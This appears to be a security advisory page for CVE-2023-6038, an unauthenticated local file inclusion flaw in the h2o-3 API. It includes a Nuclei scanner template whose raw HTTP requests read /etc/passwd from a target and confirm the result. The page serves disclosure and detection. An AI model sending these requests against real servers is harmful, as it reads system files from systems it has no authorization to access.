Local File Inclusion Vulnerability
A Local File Inclusion (LFI) vulnerability was identified in the h2o-3 API version 3.40.0.4, allowing unauthenticated remote attackers to read any file on the server's filesystem. This vulnerability is present in the default installation of the software, requiring no user interaction to exploit. The issue was reported to the developers on June 8, 2023, but as of the last update, a fixed version has not been specified.
Available publicly on Nov 16 2023
Nuclei Template
Nuclei Template
1id: h2o-importfiles-lfi
2
3info:
4 name: H2O ImportFiles LFI
5 author: danmcinerney (Vuln Discovery), byt3bl33d3r (Nuclei Template)
6 severity: high
7 description: H2O is vulnerable to an local file include in it's ImportFiles API endpoint
8 reference:
9 - https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c/
10 classification:
11 cvss-score: 8.6
12 cve-id: CVE-2023-6038
13 cwe-id: CWE-29
14 tags: h2o-3,h2o,ml,cve,protectai,huntr
15
16http:
17 - raw:
18 - |
19 GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1
20 Host: {{Hostname}}
21
22 - |
23 POST /3/ParseSetup HTTP/1.1
24 Host: {{Hostname}}
25 Content-Type: application/x-www-form-urlencoded
26
27 source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D
28
29 matchers-condition: and
30 matchers:
31 - type: regex
32 regex:
33 - "root:.*:0:0:"
34
35 - type: status
36 status:
37 - 200Resources
Learn how to use the Nuclei scanners and other scripts, or download the scanners and use them yourself.
Want more out of Sightline?
Sightline offers even more for premium customers
Go Premium
We have - related security advisories that are available with Sightline Premium.